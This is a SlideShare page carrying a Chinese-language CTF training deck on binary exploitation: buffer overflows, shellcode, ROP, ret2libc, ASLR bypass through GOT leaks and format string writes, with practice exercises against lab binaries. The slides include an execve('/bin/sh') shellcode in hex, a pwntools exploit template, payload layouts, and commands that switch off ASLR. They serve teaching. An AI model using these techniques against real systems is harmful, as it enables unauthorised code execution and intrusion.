SlideShare uma empresa Scribd logo

TDOH x 台科 pwn課程

Weber Tsai
Weber Tsai

TDOH x 台科 pwn課程

Educação
1 de 121
Baixar para ler offline
PWN Basic II
….
PWN )
QAQ
<(_ _)>
• Ubuntu VM • practices.tar.gz
PWN
PWN CTF CTF
• IP port •
Overflow
btw… btw..
Overflow
Overflow
....... ?
Outline • Buffer Overflow • ROP ( Return Oriented Programing ) • ret2libc • ret2text
 • gadgets
 • format string vulnerability • CTF ( Attack & Defense )
Buffer Overflow
x86 Stack Layout buffer >> EBP Return Address Arg 1 Arg 2 … EBP EBP + 0x04 EBP + 0x08 EBP + 0x0C EBP - 0x04 EBP - 0x08
Buffer Overflow void Function( arg1, arg2 ) { char buffer[16]; … … scanf(“%s”, &buffer); … … } push ebp mov ebp, esp sub ebp, 0x10 … … ———> ———> buffer EBP Return Address arg1 arg2 … EBP EBP + 0x04 EBP + 0x08 EBP + 0x0C EBP - 0x04 EBP - 0x08 ———> EBP - 0x0C EBP - 0x10
Buffer Overflow void Function( arg1, arg2 ) { char buffer[16]; … … scanf(“%s”, &buffer); … … } ———>
AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA Buffer Overflow
Buffer Overflow AAAA AAAA AAAA AAAA AAAA AAAA AAAA AAAA … EBP EBP + 0x04 EBP + 0x08 EBP + 0x0C EBP - 0x04 EBP - 0x08 EBP - 0x0C EBP - 0x10
Buffer Overflow AAAA AAAA AAAA AAAA AAAA AAAA AAAA AAAA … EBP EBP + 0x04 EBP + 0x08 EBP + 0x0C EBP - 0x04 EBP - 0x08 EBP - 0x0C EBP - 0x10 buffer EBP Return Address arg1 arg2 … EBP EBP + 0x04 EBP + 0x08 EBP + 0x0C EBP - 0x04 EBP - 0x08 EBP - 0x0C EBP - 0x10 Before After
Buffer OverflowBuffer Overflow … … leave ret AAAA AAAA AAAA AAAA AAAA AAAA AAAA AAAA … ESP >>
Buffer Overflow ret = pop eip jmp AAAA AAAA AAAA AAAA AAAA AAAA AAAA AAAA AAAA … ESP >>
Control EIP ? Buffer Overflow
Practice #1
Practice #1
Step #1 • Return Address ? • buffer • • pwntools (http://pwntools.com/)
Step #2 •
Step #3 from pwn import * r = process('./pratice1') eip = payload = 'a' * + p32(eip) r.sendline(payload) r.interactive()
system(“/bin/sh”)
AAAA AAAA AAAA AAAA AAAA 0x8000f04 or -> jmp esp shellcode … 0x8000f00 0x8000f04 0x8000f08 0x8000ffc 0x8000ff8 0x8000ff4 0x8000ff0 0x8000fec Buffer Overflow
Practice #2
Step #1 Find Return Address
Step #2 • Stack • gdb ? gdb stack • coredump
 $ ulimit -c unlimited
 $ sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/ core_pattern’ • jmp esp
Step #2
Step #2 jmp esp ?
Step #3 ShellCode ShellCode nasm DIY scanf 0x0b 0x0a 0x00 … etc shellcode
Step #3Step #3 08048062 <starter>: 8048062: 31 c0 xor eax,eax 8048064: 40 inc eax 8048065: 40 inc eax 8048066: 40 inc eax 8048067: 40 inc eax 8048068: 40 inc eax 8048069: 40 inc eax 804806a: 40 inc eax 804806b: 40 inc eax 804806c: 40 inc eax 804806d: 40 inc eax 804806e: 40 inc eax 804806f: 31 c9 xor ecx,ecx 8048071: 51 push ecx 8048072: 68 2f 2f 73 68 push 0x68732f2f 8048077: 68 2f 62 69 6e push 0x6e69622f 804807c: 89 e3 mov ebx,esp 804807e: 31 d2 xor edx,edx 8048080: cd 80 int 0x80 ebx = “bin/shx00” ecx= 0 eax= 11 edx = 0 execve
Step #3 shellcode = “x31xc0x40x40” “x40x40x40x40” “x40x40x40x40” “x40x31xc9x51” “x68x2fx2fx73” “x68x68x2fx62” “x6ex89xe3x31” “xd2xcdx80”
Step #4 • payload = 
 
 ‘a’ * ?? + stack_address + shellcode • Write Exploit ~~~
DEP Data Execution Prevention
aaaa aaaa aaaa aaaa aaaa 0xffffcff4 Shell Code … 0xffffcff0 0xffffcff4 0xffffcff8 0xffffcfe8 0xffffcfec 0xffffcfe4 0xffffcfe0 0xffffcfdc ShellCode Stack ...
Stack RRRRRRRRRRR
ROP Return Oriented Programing
ROP ret ret
ROP ret ret ret ret ret ret ret …
ROP
ROP
ROP ret2libc DEP return stack return libc.so system(“/bin/sh”);
system(“bin/sh”); ROP - ret2libc
ROP - ret2libc aaaa aaaa aaaa aaaa aaaa system fake ret address “/bin/sh” 0xffffcff0 0xffffcff4 0xffffcff8 0xffffcfe8 0xffffcfec 0xffffcfe4 0xffffcfe0 0xffffcfdc 0xffffcffc <— return system <- return <- system “/bin/sh”
Practice #3
Step #1 Find Return Address
Step #2 • system ? • “/bin/sh” ? echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Step #3 • Write Payload aaaa aaaa aaaa aaaa aaaa system addr fake ret address “/bin/sh”
ROP ret2text return code / plt PIE text static link Code
ROP gadgets
ROP - gadgets pop edx ret xor eax,eax ret push esp ret mov eax,ebx ret
ROP - gadgets R/W Register: pop eax ret R/W Memory: pop edx pop eax mov [eax],edx ret Logical Operation: xor eax,eax and eax,ecx
ROP chain pop edx ret pop eax ret 0x080481c9 controll edx 0x08043a24 controll eax ... ... 0x080481c9 0x08043a24 ... ret
ROP - gadgets
gadgets? ROP - gadgets
ROP - gadgets ROPgadget.py
 
 https://github.com/JonathanSalwan/ROPgadget
ROPgadget.py • ret gadgets • ROP chain
Practice #4
• ROPgadget • objdump -d filename • | less less
ASLR Address Space Layout Randomization
ASLR Stack
 Heap
 Shared Libary
 
 ……. libc
ASLR • cat /proc/<pid>/maps section • ASLR shared lib stack heap
....
system “/bin/sh” aaaa aaaa aaaa aaaa aaaa system fake ret address “/bin/sh” 0xffffcff0 0xffffcff4 0xffffcff8 0xffffcfe8 0xffffcfec 0xffffcfe4 0xffffcfe0 0xffffcfdc 0xffffcffc ASLR
ASLR libc gadgets…. ...libc
ASLR
?
system
• Libc • Libc • got.plt • system…
• oveflow binary puts write fwrite …… got stdout • got • system ‘bin/sh’ • overflow system(“/bin/sh”)
aaaaaaaaaa…. plt_write vulner_function 0 got_write 4
aaaaaaaaaa…. system 0 &“bin/sh”
Practice #5
• pwntools ELF binary • pwntools ELF.symbol[func_name] plt • pwntools ELF.got[function_name] got • puts leak got • system ”bin/sh”
format string Vulnerability ... ... XD
scanf printf
printf
scanf
... printf format String
%n ..?
%n • • Ex. • printf(“12345%n”, &a): • 5 a
• format String %n • %hn %hhn • %n 4 byte (int) • %hn 2 byte (short) • %hhn 1 byte (byte)
....
3
payload der (X
IOWrapper
IO Wrapper • • • flag • • der
IO Wrapper • printf puts …… etc • scanf gets ...... etc
 
 
 
 /
IO Wrapper IO Wrapper Process 1 Process 2 Process … execvp socket server
IO Wrapper • ? • fork() • pid_t pid = fork();
 
 if ( pid == 0 ) {
 /* sub process */
 execvpe(…);
 
 } else {
 /* parent */
 }

IO Wrapper • stdin/stdout ? • pipe • pipe : pipe() dup2()
IO Wrapper • while ( true ) {
 
 fread(stdin, ….. );
 /* may blocked */
 
 fwrite(stdin_of_sub_process,…..);
 
 fread(stdin, ….. );
 /* may blocked */
 
 fwrite(stdout, …..);
 
 } IO Blocked
select
IO Wrapper • select() and pselect() allow a program to monitor multiple file descriptors, waiting until one or more of the file descriptors become "ready" for some class of I/O operation (e.g., input possible). A file descriptor is considered ready if it is possible to perform a corresponding I/O operation (e.g., read(2) without blocking, or a sufficiently small write(2)). http://man7.org/linux/man-pages/man2/select.2.html
• file descriptor (fd) fd • blocked
select 
 
 fd
select 
 http://goo.gl/RKIOeO
LD_PRELOAD
LD_PRELOAD • LD_PRLOAD • library •
LD_PRELOAD • mylib.c #include <stddef.h> #include <stdio.h> int puts(const char * str) { /* */ }
LD_PRELOAD • main.c #include <stdlib.h> #include <stdio.h> void main(int argc,char * argv[]) { puts(“Hello World”); }
LD_PRELOAD • $ gcc -Wall -fpic -shared -o mylib.so mylib.c • $ gcc -o main main.c • $ LD_PRELOAD=./mylib.so • $ ./main
<(_ _)>
Reference • http://drops.wooyun.org/tips/6597 • AIS3 Binary Exploit • http://pwntools.readthedocs.org/en/latest/ dynelf.html • http://www.slideshare.net/hackstuff/rop-40525248

Recomendados

Linux Binary Exploitation - Heap Exploitation
Linux Binary Exploitation - Heap Exploitation Linux Binary Exploitation - Heap Exploitation
Linux Binary Exploitation - Heap Exploitation
Angel Boy
 
Binary exploitation - AIS3
Binary exploitation - AIS3Binary exploitation - AIS3
Binary exploitation - AIS3
Angel Boy
 
Windows 10 Nt Heap Exploitation (Chinese version)
Windows 10 Nt Heap Exploitation (Chinese version)Windows 10 Nt Heap Exploitation (Chinese version)
Windows 10 Nt Heap Exploitation (Chinese version)
Angel Boy
 
Pwning in c++ (basic)
Pwning in c++ (basic)Pwning in c++ (basic)
Pwning in c++ (basic)
Angel Boy
 
Linux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend ProgramingLinux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend Programing
Angel Boy
 
台科逆向簡報
台科逆向簡報台科逆向簡報
台科逆向簡報
耀德 蔡
 
Linux Binary Exploitation - Stack buffer overflow
Linux Binary Exploitation - Stack buffer overflowLinux Binary Exploitation - Stack buffer overflow
Linux Binary Exploitation - Stack buffer overflow
Angel Boy
 
Linux binary Exploitation - Basic knowledge
Linux binary Exploitation - Basic knowledgeLinux binary Exploitation - Basic knowledge
Linux binary Exploitation - Basic knowledge
Angel Boy
 

Recomendados

Linux Binary Exploitation - Heap Exploitation
Linux Binary Exploitation - Heap Exploitation Linux Binary Exploitation - Heap Exploitation
Linux Binary Exploitation - Heap Exploitation
Angel Boy
 
Binary exploitation - AIS3
Binary exploitation - AIS3Binary exploitation - AIS3
Binary exploitation - AIS3
Angel Boy
 
Windows 10 Nt Heap Exploitation (Chinese version)
Windows 10 Nt Heap Exploitation (Chinese version)Windows 10 Nt Heap Exploitation (Chinese version)
Windows 10 Nt Heap Exploitation (Chinese version)
Angel Boy
 
Pwning in c++ (basic)
Pwning in c++ (basic)Pwning in c++ (basic)
Pwning in c++ (basic)
Angel Boy
 
Linux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend ProgramingLinux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend Programing
Angel Boy
 
台科逆向簡報
台科逆向簡報台科逆向簡報
台科逆向簡報
耀德 蔡
 
Linux Binary Exploitation - Stack buffer overflow
Linux Binary Exploitation - Stack buffer overflowLinux Binary Exploitation - Stack buffer overflow
Linux Binary Exploitation - Stack buffer overflow
Angel Boy
 
Linux binary Exploitation - Basic knowledge
Linux binary Exploitation - Basic knowledgeLinux binary Exploitation - Basic knowledge
Linux binary Exploitation - Basic knowledge
Angel Boy
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
Peter Hlavaty
 
ROP 輕鬆談
ROP 輕鬆談ROP 輕鬆談
ROP 輕鬆談
hackstuff
 
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27
Sheng-Hao Ma
 
Advanced heap exploitaion
Advanced heap exploitaionAdvanced heap exploitaion
Advanced heap exploitaion
Angel Boy
 
Modern Kernel Pool Exploitation: Attacks and Techniques
Modern Kernel Pool Exploitation: Attacks and TechniquesModern Kernel Pool Exploitation: Attacks and Techniques
Modern Kernel Pool Exploitation: Attacks and Techniques
Michael Scovetta
 
Windows 10 Nt Heap Exploitation (English version)
Windows 10 Nt Heap Exploitation (English version)Windows 10 Nt Heap Exploitation (English version)
Windows 10 Nt Heap Exploitation (English version)
Angel Boy
 
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesWindows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Peter Hlavaty
 
Reliable Windows Heap Exploits
Reliable Windows Heap ExploitsReliable Windows Heap Exploits
Reliable Windows Heap Exploits
amiable_indian
 
Play with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit TechniquePlay with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit Technique
Angel Boy
 
DeathNote of Microsoft Windows Kernel
DeathNote of Microsoft Windows KernelDeathNote of Microsoft Windows Kernel
DeathNote of Microsoft Windows Kernel
Peter Hlavaty
 
eBPF maps 101
eBPF maps 101eBPF maps 101
eBPF maps 101
SUSE Labs Taipei
 
BPF: Tracing and more
BPF: Tracing and moreBPF: Tracing and more
BPF: Tracing and more
Brendan Gregg
 
Tcache Exploitation
Tcache ExploitationTcache Exploitation
Tcache Exploitation
Angel Boy
 
Meet cute-between-ebpf-and-tracing
Meet cute-between-ebpf-and-tracingMeet cute-between-ebpf-and-tracing
Meet cute-between-ebpf-and-tracing
Viller Hsiao
 
/proc/irq/&lt;irq>/smp_affinity
/proc/irq/&lt;irq>/smp_affinity/proc/irq/&lt;irq>/smp_affinity
/proc/irq/&lt;irq>/smp_affinity
Takuya ASADA
 
Linux Profiling at Netflix
Linux Profiling at NetflixLinux Profiling at Netflix
Linux Profiling at Netflix
Brendan Gregg
 
Heap exploitation
Heap exploitationHeap exploitation
Heap exploitation
Angel Boy
 
BPF Internals (eBPF)
BPF Internals (eBPF)BPF Internals (eBPF)
BPF Internals (eBPF)
Brendan Gregg
 
Sigreturn Oriented Programming
Sigreturn Oriented ProgrammingSigreturn Oriented Programming
Sigreturn Oriented Programming
Angel Boy
 
Faster packet processing in Linux: XDP
Faster packet processing in Linux: XDPFaster packet processing in Linux: XDP
Faster packet processing in Linux: XDP
Daniel T. Lee
 
逆向工程入門
逆向工程入門逆向工程入門
逆向工程入門
耀德 蔡
 
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
Sheng-Hao Ma
 

Mais conteúdo relacionado

Mais procurados

You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
Peter Hlavaty
 
Modern Kernel Pool Exploitation: Attacks and Techniques
Modern Kernel Pool Exploitation: Attacks and TechniquesModern Kernel Pool Exploitation: Attacks and Techniques
Modern Kernel Pool Exploitation: Attacks and Techniques
Michael Scovetta
 
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesWindows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Peter Hlavaty
 
DeathNote of Microsoft Windows Kernel
DeathNote of Microsoft Windows KernelDeathNote of Microsoft Windows Kernel
DeathNote of Microsoft Windows Kernel
Peter Hlavaty
 
BPF: Tracing and more
BPF: Tracing and moreBPF: Tracing and more
BPF: Tracing and more
Brendan Gregg
 
/proc/irq/&lt;irq>/smp_affinity
/proc/irq/&lt;irq>/smp_affinity/proc/irq/&lt;irq>/smp_affinity
/proc/irq/&lt;irq>/smp_affinity
Takuya ASADA
 
Faster packet processing in Linux: XDP
Faster packet processing in Linux: XDPFaster packet processing in Linux: XDP
Faster packet processing in Linux: XDP
Daniel T. Lee
 

Mais procurados (20)

You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
 
ROP 輕鬆談
ROP 輕鬆談ROP 輕鬆談
ROP 輕鬆談
 
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27
 
Advanced heap exploitaion
Advanced heap exploitaionAdvanced heap exploitaion
Advanced heap exploitaion
 
Modern Kernel Pool Exploitation: Attacks and Techniques
Modern Kernel Pool Exploitation: Attacks and TechniquesModern Kernel Pool Exploitation: Attacks and Techniques
Modern Kernel Pool Exploitation: Attacks and Techniques
 
Windows 10 Nt Heap Exploitation (English version)
Windows 10 Nt Heap Exploitation (English version)Windows 10 Nt Heap Exploitation (English version)
Windows 10 Nt Heap Exploitation (English version)
 
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesWindows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
 
Reliable Windows Heap Exploits
Reliable Windows Heap ExploitsReliable Windows Heap Exploits
Reliable Windows Heap Exploits
 
Play with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit TechniquePlay with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit Technique
 
DeathNote of Microsoft Windows Kernel
DeathNote of Microsoft Windows KernelDeathNote of Microsoft Windows Kernel
DeathNote of Microsoft Windows Kernel
 
eBPF maps 101
eBPF maps 101eBPF maps 101
eBPF maps 101
 
BPF: Tracing and more
BPF: Tracing and moreBPF: Tracing and more
BPF: Tracing and more
 
Tcache Exploitation
Tcache ExploitationTcache Exploitation
Tcache Exploitation
 
Meet cute-between-ebpf-and-tracing
Meet cute-between-ebpf-and-tracingMeet cute-between-ebpf-and-tracing
Meet cute-between-ebpf-and-tracing
 
/proc/irq/&lt;irq>/smp_affinity
/proc/irq/&lt;irq>/smp_affinity/proc/irq/&lt;irq>/smp_affinity
/proc/irq/&lt;irq>/smp_affinity
 
Linux Profiling at Netflix
Linux Profiling at NetflixLinux Profiling at Netflix
Linux Profiling at Netflix
 
Heap exploitation
Heap exploitationHeap exploitation
Heap exploitation
 
BPF Internals (eBPF)
BPF Internals (eBPF)BPF Internals (eBPF)
BPF Internals (eBPF)
 
Sigreturn Oriented Programming
Sigreturn Oriented ProgrammingSigreturn Oriented Programming
Sigreturn Oriented Programming
 
Faster packet processing in Linux: XDP
Faster packet processing in Linux: XDPFaster packet processing in Linux: XDP
Faster packet processing in Linux: XDP
 

Destaque

2010 b5 spam source detection at home
2010 b5 spam source detection at home2010 b5 spam source detection at home
2010 b5 spam source detection at home
Canaan Kao
 
資訊安全入門
資訊安全入門資訊安全入門
資訊安全入門
Tyler Chen
 

Destaque (20)

逆向工程入門
逆向工程入門逆向工程入門
逆向工程入門
 
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
 
Ctf hello,world!
Ctf hello,world! Ctf hello,world!
Ctf hello,world!
 
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsTDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on Windows
 
CTF 經驗分享
CTF 經驗分享CTF 經驗分享
CTF 經驗分享
 
HITCON GIRLS 成大講座 惡意程式分析(Turkey)
HITCON GIRLS 成大講座 惡意程式分析(Turkey)HITCON GIRLS 成大講座 惡意程式分析(Turkey)
HITCON GIRLS 成大講座 惡意程式分析(Turkey)
 
防毒擋不住?勒索病毒猖獗與實作
防毒擋不住?勒索病毒猖獗與實作防毒擋不住?勒索病毒猖獗與實作
防毒擋不住?勒索病毒猖獗與實作
 
HITCON GIRLS 成大講座 基礎知識(蜘子珣)
HITCON GIRLS 成大講座 基礎知識(蜘子珣)HITCON GIRLS 成大講座 基礎知識(蜘子珣)
HITCON GIRLS 成大講座 基礎知識(蜘子珣)
 
開發學校雲端服務的奇技淫巧(Tips for Building Third-Party School Service)
開發學校雲端服務的奇技淫巧(Tips for Building Third-Party School Service)開發學校雲端服務的奇技淫巧(Tips for Building Third-Party School Service)
開發學校雲端服務的奇技淫巧(Tips for Building Third-Party School Service)
 
2010 b5 spam source detection at home
2010 b5 spam source detection at home2010 b5 spam source detection at home
2010 b5 spam source detection at home
 
2012 the botnet traffic forensics system
2012 the botnet traffic forensics system2012 the botnet traffic forensics system
2012 the botnet traffic forensics system
 
2013 the current methodologies for apt malware traffic detection
2013 the current methodologies for apt malware traffic detection2013 the current methodologies for apt malware traffic detection
2013 the current methodologies for apt malware traffic detection
 
Some things before network attack
Some things before network attackSome things before network attack
Some things before network attack
 
PHDAYS: DGAs and Threat Intelligence
PHDAYS: DGAs and Threat IntelligencePHDAYS: DGAs and Threat Intelligence
PHDAYS: DGAs and Threat Intelligence
 
Malware classification and traceability
Malware classification and traceabilityMalware classification and traceability
Malware classification and traceability
 
Some things about LAN device detection
Some things about LAN device detectionSome things about LAN device detection
Some things about LAN device detection
 
Static Code Analysis 靜態程式碼分析
Static Code Analysis 靜態程式碼分析Static Code Analysis 靜態程式碼分析
Static Code Analysis 靜態程式碼分析
 
資訊安全入門
資訊安全入門資訊安全入門
資訊安全入門
 
勒索軟體態勢與應措
勒索軟體態勢與應措勒索軟體態勢與應措
勒索軟體態勢與應措
 
網站自動化測試
網站自動化測試網站自動化測試
網站自動化測試
 

Semelhante a TDOH x 台科 pwn課程

20190521 pwn 101_by_roy
20190521 pwn 101_by_roy20190521 pwn 101_by_roy
20190521 pwn 101_by_roy
Roy
 
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
Jagadisha Maiya
 
Exploring the x64
Exploring the x64Exploring the x64
Exploring the x64
FFRI, Inc.
 
Yandex may 2013 a san-tsan_msan
Yandex may 2013 a san-tsan_msanYandex may 2013 a san-tsan_msan
Yandex may 2013 a san-tsan_msan
Yandex
 
Yandex may 2013 a san-tsan_msan
Yandex may 2013 a san-tsan_msanYandex may 2013 a san-tsan_msan
Yandex may 2013 a san-tsan_msan
Yandex
 
Performance tweaks and tools for Linux (Joe Damato)
Performance tweaks and tools for Linux (Joe Damato)Performance tweaks and tools for Linux (Joe Damato)
Performance tweaks and tools for Linux (Joe Damato)
Ontico
 
Windows debugging sisimon
Windows debugging sisimonWindows debugging sisimon
Windows debugging sisimon
Sisimon Soman
 
¡Ups! código inseguro: detección, explotación y mitigación de vulnerabilidade...
¡Ups! código inseguro: detección, explotación y mitigación de vulnerabilidade...¡Ups! código inseguro: detección, explotación y mitigación de vulnerabilidade...
¡Ups! código inseguro: detección, explotación y mitigación de vulnerabilidade...
Software Guru
 
Finding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyFinding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated Disassembly
Priyanka Aash
 

Semelhante a TDOH x 台科 pwn課程 (20)

20190521 pwn 101_by_roy
20190521 pwn 101_by_roy20190521 pwn 101_by_roy
20190521 pwn 101_by_roy
 
Modern Linux Tracing Landscape
Modern Linux Tracing LandscapeModern Linux Tracing Landscape
Modern Linux Tracing Landscape
 
Scale17x buffer overflows
Scale17x buffer overflowsScale17x buffer overflows
Scale17x buffer overflows
 
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to us
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to usThat Goes Without Alpha-Num (or Does It ?) all your base10 are belong to us
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to us
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
ROP
ROPROP
ROP
 
Debugging linux kernel tools and techniques
Debugging linux kernel tools and techniquesDebugging linux kernel tools and techniques
Debugging linux kernel tools and techniques
 
Troubleshooting Linux Kernel Modules And Device Drivers
Troubleshooting Linux Kernel Modules And Device DriversTroubleshooting Linux Kernel Modules And Device Drivers
Troubleshooting Linux Kernel Modules And Device Drivers
 
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
 
Exploring the x64
Exploring the x64Exploring the x64
Exploring the x64
 
Compromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsCompromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging Mechanisms
 
Yandex may 2013 a san-tsan_msan
Yandex may 2013 a san-tsan_msanYandex may 2013 a san-tsan_msan
Yandex may 2013 a san-tsan_msan
 
Yandex may 2013 a san-tsan_msan
Yandex may 2013 a san-tsan_msanYandex may 2013 a san-tsan_msan
Yandex may 2013 a san-tsan_msan
 
Yandex may 2013 a san-tsan_msan
Yandex may 2013 a san-tsan_msanYandex may 2013 a san-tsan_msan
Yandex may 2013 a san-tsan_msan
 
Software to the slaughter
Software to the slaughterSoftware to the slaughter
Software to the slaughter
 
Performance tweaks and tools for Linux (Joe Damato)
Performance tweaks and tools for Linux (Joe Damato)Performance tweaks and tools for Linux (Joe Damato)
Performance tweaks and tools for Linux (Joe Damato)
 
Windows debugging sisimon
Windows debugging sisimonWindows debugging sisimon
Windows debugging sisimon
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby Systems
 
¡Ups! código inseguro: detección, explotación y mitigación de vulnerabilidade...
¡Ups! código inseguro: detección, explotación y mitigación de vulnerabilidade...¡Ups! código inseguro: detección, explotación y mitigación de vulnerabilidade...
¡Ups! código inseguro: detección, explotación y mitigación de vulnerabilidade...
 
Finding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyFinding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated Disassembly
 

Último

Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
ZurliaSoop
 

Último (20)

UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdfUGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
 
NO1 Top Black Magic Specialist In Lahore Black magic In Pakistan Kala Ilam Ex...
NO1 Top Black Magic Specialist In Lahore Black magic In Pakistan Kala Ilam Ex...NO1 Top Black Magic Specialist In Lahore Black magic In Pakistan Kala Ilam Ex...
NO1 Top Black Magic Specialist In Lahore Black magic In Pakistan Kala Ilam Ex...
 
Sociology 101 Demonstration of Learning Exhibit
Sociology 101 Demonstration of Learning ExhibitSociology 101 Demonstration of Learning Exhibit
Sociology 101 Demonstration of Learning Exhibit
 
How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17
 
How to Add New Custom Addons Path in Odoo 17
How to Add New Custom Addons Path in Odoo 17How to Add New Custom Addons Path in Odoo 17
How to Add New Custom Addons Path in Odoo 17
 
Plant propagation: Sexual and Asexual propapagation.pptx
Plant propagation: Sexual and Asexual propapagation.pptxPlant propagation: Sexual and Asexual propapagation.pptx
Plant propagation: Sexual and Asexual propapagation.pptx
 
Graduate Outcomes Presentation Slides - English
Graduate Outcomes Presentation Slides - EnglishGraduate Outcomes Presentation Slides - English
Graduate Outcomes Presentation Slides - English
 
80 ĐỀ THI THỬ TUYỂN SINH TIẾNG ANH VÀO 10 SỞ GD – ĐT THÀNH PHỐ HỒ CHÍ MINH NĂ...
80 ĐỀ THI THỬ TUYỂN SINH TIẾNG ANH VÀO 10 SỞ GD – ĐT THÀNH PHỐ HỒ CHÍ MINH NĂ...80 ĐỀ THI THỬ TUYỂN SINH TIẾNG ANH VÀO 10 SỞ GD – ĐT THÀNH PHỐ HỒ CHÍ MINH NĂ...
80 ĐỀ THI THỬ TUYỂN SINH TIẾNG ANH VÀO 10 SỞ GD – ĐT THÀNH PHỐ HỒ CHÍ MINH NĂ...
 
How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17
 
Interdisciplinary_Insights_Data_Collection_Methods.pptx
Interdisciplinary_Insights_Data_Collection_Methods.pptxInterdisciplinary_Insights_Data_Collection_Methods.pptx
Interdisciplinary_Insights_Data_Collection_Methods.pptx
 
Beyond_Borders_Understanding_Anime_and_Manga_Fandom_A_Comprehensive_Audience_...
